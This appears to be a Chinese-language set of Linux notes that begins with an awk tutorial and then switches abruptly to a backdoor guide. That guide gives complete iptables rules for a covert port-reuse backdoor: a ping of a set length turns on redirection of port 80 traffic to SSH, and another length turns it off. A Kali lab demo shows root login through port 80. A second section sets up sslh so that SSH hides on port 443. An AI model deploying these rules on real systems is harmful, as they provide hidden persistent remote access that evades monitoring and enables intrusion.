Awk介绍:
awk是一种编程语言,用于在linux/unix下对文本和数据进行处理。它支持用户自定义函数和动态正则表达式等先进功能,是linux/unix下的一个强大编程工具。
常用命令选项
-F fs:fs指定输入分隔符,fs可以是字符串或正则表达式,如-F:
-v var=value:赋值一个用户定义变量,将外部变量传递给awk
-f scripfile:从脚本文件中读取awk命令
内置变量
- FS :输入字段分隔符,默认为空白字符
awk -v FS=“:” ‘{print $1}’ /etc/passwd - OFS :输出字段分隔符,默认为空白字符
awk -v FS=‘:’ -v OFS=‘|’ ‘{print $1,$2}’ /etc/passwd - RS :输入记录分隔符,指定输入时的换行符,原换行符仍有效
awk -v RS=“:” ‘{print $1,$2}’ /etc/passwd 以冒号为节点进行换行打印 - ORS :输出记录分隔符,输出时用指定符号代替换行符
awk -v FS=‘:’ -v ORS=‘|’ ‘{print $1,$2}’ /etc/passwd - NF :字段数量, $NF引用最后一列,$(NF-1)引用倒数第2列
[root@www ~]# awk -v FS=“:” ‘{print $1,$(NF-1),$NF}’ /etc/passwd - NR :行号,后可跟多个文件,第二个文件行号继续从第一个文件最后行号开始
[root@www ~]# awk -v FS=‘:’ ‘{print $1,NR}’ /etc/passwd | head -n 5 - FNR :各文件分别计数, 行号,后跟一个文件和NR一样,跟多个文件,第二个文件行号从1开始
awk -v FS=‘:’ ‘{print $1,FNR}’ cdx.file /etc/passwd| head -n 5 - FILENAME :当前文件名
[root@along ~]# awk ‘{print FILENAME}’ cdx.file - ARGC :命令行参数的个数
[root@www ~]# awk ‘BEGIN {print ARGC}’ 1 2 3 4 3
Print命令 格式
1.格式化输出 printf` `"FORMAT"``, item1,item2, ...
1)必须指定FORMAT
2)不会自动换行,需要显式给出换行控制符
3)FORMAT 中需要分别为后面每个item 指定格式符
2.格式符:与item 一一对应
%c: 显示字符的ASCII码
%d, %i: 显示十进制整数
%e, %E: 显示科学计数法数值
%f :显示为浮点数,小数** %5.1f,带整数、小数点、整数共5位,小数1位,不够用空格补上
%g, %G :以科学计数法或浮点形式显示数值
%s :显示字符串;例:%5s最少5个字符,不够用空格补上,超过5个还继续显示
%u :无符号整数
%%: 显示% 自身
iptables端口复用后门
ICMP协议做遥控开关
创建端口复用链
iptables -t nat -N Port_multiplexing_chain
创建端口复用规则,将流量转发至22端口
iptables -t nat -A Port_multiplexing_chain -p tcp -j REDIRECT --to-port 22
开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name oupeng --rsource -j ACCEPT
关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name oupeng --remove -j ACCEPT
如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到Port_multiplexing_chain链进行处理,有效时间为 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name oupeng --rsource -j Port_multiplexing_chain
开启复用,向目标发送一个长度为1111的ICMP数据包(加上IP的包头20位和ICMP包头的8位实际位数位1139)
┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129
ssh: connect to host 192.168.218.129 port 22: Connection timed out
┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1111 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1111(1139) bytes of data.
1119 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.826 ms
--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.826/0.826/0.826/0.000 ms
┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129 -p 80
The authenticity of host '[192.168.218.129]:80 ([192.168.218.129]:80)' can't be established.
ED25519 key fingerprint is SHA256:Xyl+VWFSAPsWpBdCAW3pJSxbbajvRsoVvfqXavSa6fA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.129]:80' (ED25519) to the list of known hosts.
root@192.168.218.129's password:
Activate the web console with: systemctl enable --now cockpit.socket
Register this system with Red Hat Insights: insights-client --register
Create an account or view all your systems at https://red.ht/insights-dashboard
Last login: Thu Feb 2 09:10:41 2023 from 192.168.218.1
[root@localhost ~]#
关闭复用向目标发送一个长度为1112的ICMP数据包
┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1112 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1112(1140) bytes of data.
1120 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.377 ms
--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.377/0.377/0.377/0.000 ms
该方法的缺点是,如果目标在内网,我们无法直接ping
Sshl隐藏端口 环境kail
- 下载sslh
┌──(root㉿kali)-[~]
└─ apt-get install sslh -y
- 设置配置
# Default options for sslh initscript
# sourced by /etc/init.d/sslh
# binary to use: forked (sslh) or single-thread (sslh-select) version
# systemd users: don't forget to modify /lib/systemd/system/sslh.service
DAEMON=/usr/sbin/sslh
DAEMON_OPTS="--user sslh --listen <change-me>:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"
#修改为
DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"
- 启动sslh
┌──(root㉿kali)-[~]
└─ systemctl start sslh
┌──(root㉿kali)-[~]
└─ systemctl enable sslh
Synchronizing state of sslh.service with SysV service script with / lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable sslh
Created symlink /etc/systemd/system/multi-user.target.wants/sslh.service → /lib/systemd/system/sslh.service.
4.测试,检查 SSLH 守护程序是否正在监听 443
┌──(root㉿kali)-[~]
└─ ps -ef | grep sslh
sslh 1093888 1 0 12:13 ? 00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
sslh 1093890 1093888 0 12:13 ? 00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
root 1094656 1094630 0 12:15 pts/2 00:00:00 grep --color=auto sslh
5.利用
[root@localhost ~] ssh -p 443 root@192.168.218.135
The authenticity of host '[192.168.218.135]:443 ([192.168.218.135]:443)' can't be established.
ECDSA key fingerprint is SHA256:nWuRpxRY+eRmSjDLm/PTvsyEyFVbQMyQfegunja7Z4k.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.135]:443' (ECDSA) to the list of known hosts.
root@192.168.218.135's password:
Linux kali 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 2 12:15:30 2023 from 192.168.218.1
┌──(root㉿kali)-[~]
└─ uname -srm
Linux 5.18.0-kali5-amd64 x86_64